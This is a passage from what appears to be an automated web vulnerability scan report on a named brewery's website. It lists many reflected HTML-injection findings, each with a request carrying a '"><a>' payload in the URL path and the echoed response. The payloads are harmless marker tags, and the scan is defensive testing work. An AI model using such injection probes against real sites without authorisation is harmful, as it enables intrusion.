GET /beersed707"><a>9aff3285dbf/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beersed707"><a>9aff3285dbf_page" class="beersed707">
...[SNIP]...

1.160. http://www.ninkasibrewing.com/beers/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3337e"><a>bf74ccda1f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers3337e"><a>bf74ccda1f5/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers3337e"><a>bf74ccda1f5_page" class="beers3337e">
...[SNIP]...

1.161. http://www.ninkasibrewing.com/brewery/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72af8"><a>8c4153079a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery72af8"><a>8c4153079a4/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery72af8"><a>8c4153079a4_page" class="brewery72af8">
...[SNIP]...

1.162. http://www.ninkasibrewing.com/brewery/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ef1f"><a>2fabca1655f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery6ef1f"><a>2fabca1655f/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery6ef1f"><a>2fabca1655f_page" class="brewery6ef1f">
...[SNIP]...

1.163. http://www.ninkasibrewing.com/brewery/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf8b"><a>2b307023ca2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewerycaf8b"><a>2b307023ca2/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewerycaf8b"><a>2b307023ca2_page" class="brewerycaf8b">
...[SNIP]...

1.164. http://www.ninkasibrewing.com/brewery/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c630"><a>4b43cdb9ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery2c630"><a>4b43cdb9ffe/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery2c630"><a>4b43cdb9ffe_page" class="brewery2c630">
...[SNIP]...

1.165. http://www.ninkasibrewing.com/brewery/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bd1a"><a>7a2e695ff2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery8bd1a"><a>7a2e695ff2/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery8bd1a"><a>7a2e695ff2_page" class="brewery8bd1a">
...[SNIP]...

1.166. http://www.ninkasibrewing.com/brewery/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78fa0"><a>dd60fcefdd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery78fa0"><a>dd60fcefdd7/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery78fa0"><a>dd60fcefdd7_page" class="brewery78fa0">
...[SNIP]...

1.167. http://www.ninkasibrewing.com/brewery/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a328"><a>58cb21c931b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery1a328"><a>58cb21c931b/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery1a328"><a>58cb21c931b_page" class="brewery1a328">
...[SNIP]...

1.168. http://www.ninkasibrewing.com/careers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bebf4"><a>6ff175caf2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersbebf4"><a>6ff175caf2b/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersbebf4"><a>6ff175caf2b_page" class="careersbebf4">
...[SNIP]...

1.169. http://www.ninkasibrewing.com/careers/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload becda"><a>fd1c2df5815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersbecda"><a>fd1c2df5815/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersbecda"><a>fd1c2df5815_page" class="careersbecda">
...[SNIP]...

1.170. http://www.ninkasibrewing.com/careers/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd34a"><a>b8b6cd26d1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersfd34a"><a>b8b6cd26d1a/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersfd34a"><a>b8b6cd26d1a_page" class="careersfd34a">
...[SNIP]...

1.171. http://www.ninkasibrewing.com/careers/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4b5f"><a>54c1eee5e30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersb4b5f"><a>54c1eee5e30/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersb4b5f"><a>54c1eee5e30_page" class="careersb4b5f">
...[SNIP]...

1.172. http://www.ninkasibrewing.com/careers/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ea2"><a>efc19015908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersd9ea2"><a>efc19015908/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersd9ea2"><a>efc19015908_page" class="careersd9ea2">
...[SNIP]...

1.173. http://www.ninkasibrewing.com/careers/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea81e"><a>7759b9fb197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersea81e"><a>7759b9fb197/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersea81e"><a>7759b9fb197_page" class="careersea81e">
...[SNIP]...

1.174. http://www.ninkasibrewing.com/careers/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e87c5"><a>07d9d56d600 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careerse87c5"><a>07d9d56d600/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careerse87c5"><a>07d9d56d600_page" class="careerse87c5">
...[SNIP]...

1.175. http://www.ninkasibrewing.com/company/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806cc"><a>6e5127e8258 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company806cc"><a>6e5127e8258/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="company806cc"><a>6e5127e8258_page" class="company806cc">
...[SNIP]...

1.176. http://www.ninkasibrewing.com/company/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ab6"><a>2f1540286bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companyd1ab6"><a>2f1540286bf/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="companyd1ab6"><a>2f1540286bf_page" class="companyd1ab6">
...[SNIP]...

1.177. http://www.ninkasibrewing.com/company/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e706a"><a>c8816d8ff3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companye706a"><a>c8816d8ff3f/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
